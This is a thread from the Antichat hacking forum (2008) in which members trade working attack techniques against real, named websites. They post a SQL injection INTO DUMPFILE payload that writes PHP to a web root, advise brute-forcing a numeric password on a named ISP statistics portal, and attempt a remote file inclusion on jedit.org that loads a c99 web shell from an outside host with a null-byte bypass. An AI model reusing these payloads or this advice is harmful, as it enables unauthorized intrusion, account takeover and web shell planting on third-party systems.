ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1481  
Старый 31.03.2008, 16:55
Hell0
Новичок
Регистрация: 30.03.2008
Сообщений: 5
С нами: 9534127

Репутация: 0
По умолчанию

Не могу если найду подобный сайт напишу
 
Ответить с цитированием

  #1482  
Старый 31.03.2008, 20:30
Lidloses_Auge
Новичок
Регистрация: 04.01.2008
Сообщений: 6
С нами: 9659174

Репутация: 21
По умолчанию

Hi,
Is it possible to dump something INTO Dumpfile, when magic_quotes_gpc is switched on?
I tried to hex-encode the path, but no file is created then.

e.g:

www.site.com/UNION/**/SELECT/**/0x3c3f70687020706870696e666f28293b203f3e /**/INTO/**/DUMPFILE/**/'/var/www'/*

Works!

But

www.site.com/UNION/**/SELECT/**/0x3c3f70687020706870696e666f28293b203f3e /**/INTO/**/DUMPFILE/**/0x2f7661722f777777/*

doesn work!

Is there a possibility to dump files, if magic_quotes_gpc ist switched on?

Thank you.
 
Ответить с цитированием

  #1483  
Старый 31.03.2008, 20:43
Hell0
Новичок
Регистрация: 30.03.2008
Сообщений: 5
С нами: 9534127

Репутация: 0
По умолчанию

Вот нашел похожее
даже круче
http://fialki.ho.com.ua/products_pictures/
вот от создателей
http://www.shop-script.ru/images/

Последний раз редактировалось Hell0; 31.03.2008 в 21:01..
 
Ответить с цитированием

  #1484  
Старый 31.03.2008, 20:47
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию

2Lidloses_Auge
No, this construction does not work without the quotes, hex-encoding does not help
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #1485  
Старый 31.03.2008, 21:14
Dr.Dre2
Новичок
Регистрация: 31.03.2008
Сообщений: 2
С нами: 9533163

Репутация: 0
По умолчанию

Всем привет.
Подскажите плз как настроить брутфорс доля взлома такой вот байды
http://stat.corbina.com.ua/

Известен ник и известно что пароль только цыфры. Просьба помочь-долбался ничего не выходит .
 
Ответить с цитированием

  #1486  
Старый 01.04.2008, 15:25
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию

А какой конкретно брут? Их навалом ).Например, тот же Brutus AET 2 (кажись так:РР).Там можно настроить по многим протоколам,кроме ссл,но для этого другие бруты есть. Гайдов по нему тоже полно( на русском кстати) .Там должны быть настройки полным перебором, по словарю(он те наф не нужен).И указан диапазон фицр в виде 0123456789.Что-то вроде того:Р
 
Ответить с цитированием

  #1487  
Старый 01.04.2008, 17:41
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию

Warning: main(http://site/RamShellc99.php\0.html): failed to open stream: Connection refused in /home/groups/j/je/jedit/htdocs/index.php on line 63

Warning: main(): Failed opening 'http://site/RamShellc99.php\0.html' for inclusion (include_path='.:/usr/local/share/pear') in /home/groups/j/je/jedit/htdocs/index.php on line 63

Имеется запрос:

http://www.jedit.org/index.phppage=http://site/RamShellc99.php%00

В результате получается такое :

Warning: main(): Failed opening 'http://site/RamShellc99.php\0.html' for inclusion (include_path='.:/usr/local/share/pear') in /home/groups/j/je/jedit/htdocs/index.php on line 63

Я так понял,тут две веши:

1.У меня жутко кривые куриные лапы.
2.Фильтрация %0 на \
3.Какие-то проблемы с url- encoding ( ??? )

В данном случае, меня интересует , почему не заливается шелл =(. Про инклуды аля ../../../../../etc/pwd пожалуйста не надо)
 
Ответить с цитированием

  #1488  
Старый 01.04.2008, 18:46
d_x
Постоянный
Регистрация: 25.03.2008
Сообщений: 670
С нами: 9541766

Репутация: 2407


По умолчанию

Некоторые мысли...

Скрипт их прибавляет расширение .html ко всему инклудящемуся, а %00 по-видимому не прокатывает.

По идее, можно переименовать шелл в нечто вроде shell.html и заставить апач на удалённом хосте исполнять html как php, но даже в этом случае вылетает ошибка failed to open stream: Connection timed out, почему - не знаю. (пытался ко многим сайтам так обращаться, везде тайм-аут, даже к их собственному)
 
Ответить с цитированием

  #1489  
Старый 01.04.2008, 18:57
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию

Цитата:
Сообщение от d_x  
Некоторые мысли...

Скрипт их прибавляет расширение .html ко всему инклудящемуся, а %00 по-видимому не прокатывает.

По идее, можно переименовать шелл в нечто вроде shell.html и заставить апач на удалённом хосте исполнять html как php, но даже в этом случае вылетает ошибка failed to open stream: Connection timed out, почему - не знаю. (пытался ко многим сайтам так обращаться, везде тайм-аут, даже к их собственному)

Может я ща чё ляпну, но шеллкод разве может исполняться в любом файле ? (шеллкод системная с*ка ) Мошь он просто выдаёт несоответствие расширений, и потому не исполняет. Ждём-с мнение экспертов ).
 
Ответить с цитированием

  #1490  
Старый 01.04.2008, 19:00
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию

include($page.php) зло (
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 17 (пользователей: 0 , гостей: 17)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.